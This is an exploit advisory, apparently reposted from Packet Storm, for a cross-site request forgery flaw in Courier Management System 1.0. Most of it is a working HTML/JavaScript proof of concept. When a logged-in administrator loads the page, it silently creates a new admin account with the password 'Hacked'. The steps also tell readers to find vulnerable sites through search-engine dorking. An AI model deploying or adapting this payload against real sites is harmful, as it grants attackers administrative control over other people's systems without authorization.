Share
## https://sploitus.com/exploit?id=PACKETSTORM:180342
=============================================================================================================================================  
| # Title : Courier Management System 1.0 CSRF add admin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/php/14615/task-management-system-using-phpmysqli-source-code.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] Go to the line 6.  
  
[+] Set the target site link Save changes and apply .   
  
[+] save code as poc.html .  
  
  
<!DOCTYPE html>   
<html>   
<body>  
<script> function submitRequest()   
{ var xhr = new XMLHttpRequest();   
xhr.open("POST", "http://127.0.0.1/courier/ajax.php?action=save_user", true);  
xhr.setRequestHeader("Accept", "*\/*");   
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------");  
xhr.withCredentials = true;   
var body =  
"-----------------------------\r\n" +   
"Content-Disposition: form-data; name=\"email\"\r\n" +   
"\r\n" +   
"indoushka\r\n" +   
"-----------------------------\r\n" +   
"Content-Disposition: form-data; name=\"password\"\r\n" +   
"\r\n" +   
"Hacked\r\n" +   
"-----------------------------\r\n" +   
"Content-Disposition: form-data; name=\"type\"\r\n" +   
"\r\n" +   
"1\r\n" +   
"-------------------------------\r\n";   
var aBody = new Uint8Array(body.length);   
for (var i = 0; i < aBody.length; i++)   
aBody[i] = body.charCodeAt(i);   
xhr.send(new Blob([aBody]));   
}  
</script>  
<form action="#">  
<input type="button" value="Submit request" onclick="submitRequest();" />  
</form>   
</body>   
</html>  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================